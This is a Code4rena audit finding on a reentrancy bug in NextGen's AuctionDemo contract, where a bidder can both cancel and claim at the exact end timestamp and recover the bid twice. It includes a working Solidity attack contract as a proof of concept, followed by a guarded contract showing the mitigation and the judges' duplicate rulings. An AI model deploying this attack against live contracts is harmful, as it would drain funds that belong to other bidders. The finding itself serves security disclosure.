Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 207/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L116
https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L128
The bidder can get his bid amount twice by applying an illegal reentrancy between AuctionDemo.claimAuction and AuctionDemo.cancelBid.
A reentrancy can be applied between AuctionDemo.claimAuction and AuctionDemo.cancelBid.
PoC:

```solidity
interface IAuctionDemo {
    function claimAuction(uint256) external;
    function cancelBid(uint256) external;
    function participateToAuction(uint256) external payable;
}

contract attack {
    bool triggred;
    address owner;
    IAuctionDemo vuln;
    uint256 id;

    constructor(IAuctionDemo _vuln, uint256 _id) {
        owner = msg.sender;
        vuln = _vuln;
        id = _id;
    }

    function initiate() external payable {
        vuln.participateToAuction{value: msg.value}(id);
    }

    function exploit() external {
        vuln.claimAuction(id);
    }

    fallback() external payable {
        // to avoid more than two calls, which would revert on the bid cancellation requirements
        if (msg.sender == address(vuln)) {
            if (!triggred) {
                triggred = true;
                vuln.cancelBid(id);
            }
        }
    }

    receive() external payable {
        if (msg.sender == address(vuln)) {
            if (!triggred) {
                triggred = true;
                vuln.cancelBid(id);
            }
        }
    }
}
```
Cause: both functions check the timestamp with >= and <= against the auction time of the bid id (lines 125, 105). The bidder is only allowed to get his bid amount by either canceling or claiming; however, he can get his bid with both when the auction time is equal to block.timestamp, because calling both functions will be validated.
For the bug to be exploited successfully, the reentrancy must be triggered when block.timestamp is equal to minter.getAuctionEndTime(_tokenid).
Tools used: Remix IDE
Recommended mitigation: Implement a reentrancy guard on the AuctionDemo.claimAuction and AuctionDemo.cancelBid functions.
Assessed type: Reentrancy
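The mitigation and the cause named above, shown together in an added example that is not taken from the NextGen repository: a reentrancy guard on both paths, a cancel window that closes strictly before the end time, and state updated before any transfer. The contract name, storage layout and the `settle`/`withdraw` functions are assumptions made for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;
// Added illustration; NOT the NextGen AuctionDemo source. All names are hypothetical.
contract GuardedAuction {
    struct Bid { address bidder; uint256 amount; bool active; }
    uint256 public immutable endTime;        // assumption: one auction, fixed end time
    Bid[] public bids;
    mapping(address => uint256) public owed; // refunds whose push transfer failed
    uint256 private _status = 1;             // 1 = not entered, 2 = entered

    modifier nonReentrant() {
        require(_status == 1, "reentrant call");
        _status = 2;
        _;
        _status = 1;
    }
    constructor(uint256 endTime_) { endTime = endTime_; }

    function bid() external payable {
        require(block.timestamp < endTime && msg.value > 0, "bid rejected");
        bids.push(Bid(msg.sender, msg.value, true));
    }
    // Cancelling is allowed strictly before the end time ...
    function cancelBid(uint256 index) external nonReentrant {
        require(block.timestamp < endTime, "auction ended");
        Bid storage b = bids[index];
        require(b.bidder == msg.sender && b.active, "not cancellable");
        b.active = false; // effect before interaction
        (bool ok, ) = msg.sender.call{value: b.amount}("");
        require(ok, "refund failed");
    }
    // ... and settlement only from the end time on, so the two windows never overlap.
    // Simplification: winner selection and asset transfer are left out.
    function settle() external nonReentrant {
        require(block.timestamp >= endTime, "auction running");
        for (uint256 i = 0; i < bids.length; i++) {
            Bid storage b = bids[i];
            if (!b.active) continue;
            b.active = false; // mark as paid before sending
            (bool ok, ) = b.bidder.call{value: b.amount}("");
            if (!ok) owed[b.bidder] += b.amount; // one receiver must not block the rest
        }
    }
    function withdraw() external nonReentrant {
        uint256 amount = owed[msg.sender];
        owed[msg.sender] = 0; // effect before interaction
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "withdraw failed");
    }
}
```

At `block.timestamp == endTime` only `settle` passes its time check, and a receiver that calls back into `cancelBid`, `settle` or `withdraw` during a refund hits the guard; the `active` flag independently prevents a second payout for the same bid.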
#0 - c4-pre-sort
2023-11-17T14:55:03Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:40:04Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T18:20:47Z
alex-ppg marked the issue as partial-50